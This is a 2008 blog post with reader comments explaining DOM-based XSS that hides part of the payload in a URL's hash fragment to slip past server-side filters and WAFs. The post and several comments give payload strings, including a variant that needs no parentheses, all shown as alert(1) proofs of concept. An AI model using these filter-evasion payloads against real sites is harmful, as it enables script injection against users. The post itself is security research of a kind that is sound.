Location based XSS attacks
Monday, 1 December 2008
The basic attack
Using the hash portion of the location is a good way to beat filters, anything sent via the hash is not sent to the server in question. We can use a large amount of data which is hidden from the server side filters and combine it with data sent on the server. For example we can send:-
http://someserver.com/somepage.php? param=",eval(location.hash.slice(1))//#alert(1)
Data sent to the server :
",eval(location.hash.slice(1))//
Data only sent through the client :
#alert(1)
“slice” simply selects the location.hash from the second character because the # is included and would raise a syntax error.
More advanced variation
There are times when server side filters will remove all instances of “(” or “)” or maybe a WAF will disallow such requests. That alone will not save you from these sort of attacks because there’s a trick you can use to defeat those filters.
Remember the server can only see the server side potion of the attack, we can combine both strings to produce our attack without “(” or “)”. For example:-
http://someserver.com/somepage.php? param=",location='javascript:/*'+location.hash//#*/alert(1)
Data sent to the server :
",location='javascript:/*'+location.hash//
Data sent to the client :
#*/alert(1)
We start the comment in the server side request and complete it in the client side location.hash request. Location is assigned javascript:/*#*/alert(1) removing the need for the slice(1) as shown previously.
The attacks mentioned are DOM based XSS attacks and are actually more common than you think, they are just more difficult to find than regular XSS.
No. 1 — December 1st, 2008 at 6:08 pm
I really like the variation that avoids parenthesis. It’s cleaner than the setter trick and works cross browsers too. I’ll have to update my list of 2-stage injections to include it.
No. 2 — December 1st, 2008 at 9:50 pm
http://someserver.com/somepage.php?param=“,location=location#%0aalert(1)
No. 3 — December 1st, 2008 at 9:51 pm
Ooops (damn SpamBam)
http://someserver.com/somepage.php?param=“,location='javascript:’+location#%0aalert(1)
No. 4 — December 1st, 2008 at 9:54 pm
BTW, why not the ever green
http://someserver.com/somepage.php?param=“,location=name
?
No. 5 — December 1st, 2008 at 10:46 pm
Yeah nice ones there’s other ways too but I thought I’d post the comment trick cause it’s nice 🙂
location=’javascript:alert%25281%2529′
No. 6 — December 28th, 2008 at 7:28 am
Can anyone explain, in which way this in an xss-attack?
No. 7 — December 28th, 2008 at 12:30 pm
@ivan
Look up dom based XSS and that should answer your question.